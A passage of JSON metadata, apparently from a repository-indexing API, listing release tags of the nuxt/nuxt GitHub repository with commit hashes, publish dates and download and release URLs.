Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.1/manifests"},{"name":"@nuxt/ui@0.4.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.1/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"@nuxt/ui-templates@1.1.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.1.0/manifests"},{"name":"@nuxt/ui-assets@0.2.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.0/manifests"},{"name":"@nuxt/ui@0.4.0","sha":"7bb778ecb71a72350fc16484851b8c163b1db434","kind":"tag","published_at":"2023-01-06T14:51:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.4.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"p